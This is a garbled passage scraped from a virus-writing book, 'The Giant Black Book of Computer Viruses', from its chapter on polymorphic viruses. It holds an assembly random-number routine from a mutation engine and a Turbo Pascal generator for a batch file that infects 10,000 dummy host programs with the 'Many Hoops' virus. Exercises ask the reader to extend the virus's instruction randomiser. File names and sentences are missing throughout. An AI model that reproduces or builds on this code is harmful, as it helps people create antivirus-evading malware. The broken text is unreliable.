tailieunhanh - The Giant Black Book of Computer Viruses, part 8

Segments are defined to form a kind of most significant word of memory. The physical address is found by taking 16 times the segment plus the offset. In 80386 protected mode, segments are defined by a descriptor table,

Polymorphic Viruses

    ;Create a pseudo-random number and put it in ax.
    GET_RANDOM PROC NEAR
            push bx
            push cx
            push dx
            call GR1
    GR1:    pop bx
            sub bx,OFFSET GR1
            mov eax,[bx][RAND_SEED]
            mov ecx,[bx][A]
            mul ecx                     ;multiply
            add eax,[bx][C]             ;add
            adc edx,0
            mov ecx,[bx][M]
            div ecx                     ;divide
            mov eax,edx                 ;remainder in ax
            mov [bx][RAND_SEED],eax     ;and save for next round
            pop dx
            pop cx
            pop bx
            retn
    GET_RANDOM ENDP

            END

Testing the Many Hoops

If you want to generate 10,000 instances of an infection with the Many Hoops for testing purposes, the following Turbo Pascal program will create a batch file to do the job. Watch out, though: putting 10,000 files in one directory will slow your machine down incredibly. You may want to modify it to generate only 1,000 files instead. To use the batch file you'll need and in a directory along with along with at least 25 megabytes of disk space. Installing SMARTDRV will save lots of time. is as follows:

    program gen_10000; {Generate batch file to create 10000 hosts and infect them}

    var
      s,n:string;
      bf:text;
      j:word;

    begin
      assign(bf,{file name missing});
      rewrite(bf);
      writeln(bf,'md 10000');
      writeln(bf,'cd 10000');
      for j:=1 to 10000 do
        begin
          str(j,n);
          while length(n)<5 do n:='0'+n;
          writeln(bf,'copy . ',n,'.com');     {source file name missing}
        end;
      writeln(bf,'md inf');
      writeln(bf,'. manyhoop');
      for j:=2 to 10000 do
        begin
          str(j-1,n);
          while length(n)<5 do n:='0'+n;
          writeln(bf,n);
          writeln(bf,'copy ',n,'.com inf');
          writeln(bf,'del ',n,'.com');
        end;
      writeln(bf,'copy inf');                 {file name missing}
      writeln(bf,'del');                      {file name missing}
      close(bf);
    end.

And the file looks like this:

    .model tiny
    .code

    ;The host program starts here. This one is a dummy that just returns control to DOS.
            ORG 100H
    HOST:
            db 100 dup (90H)
            mov ax,4C00H
            int 21H                     ;Terminate, error code = 0
    HOST_END:
            END HOST

Exercises

1. Add one new class 3 instruction, which modifies one register, to the RAND_INSTR routine.
2. Add one new class 4 instruction, which modifies two registers, to the RAND_INSTR routine.
3. Add memory-based polymorphism to a memory
